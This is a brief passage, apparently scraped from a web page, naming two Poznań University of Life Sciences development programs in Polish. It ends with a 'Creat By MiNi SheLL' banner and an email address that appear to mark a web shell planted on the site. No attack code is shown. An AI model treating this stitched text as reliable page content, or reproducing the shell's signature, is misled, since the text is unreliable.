Zintegrowany Program Rozwoju Uniwersytetu Przyrodniczego w Poznaniu” zwanym dalej Zintegrowanym Programem Uczelni oraz „Najlepsi z natury 2.0. Zintegrowany Program Uniwersytetu Przyrodniczego <br/>w Poznaniu” zwanym dalej Zintegrowanym Programem Uczelni 2.0.

Creat By MiNi SheLL
Email: jattceo@gmail.com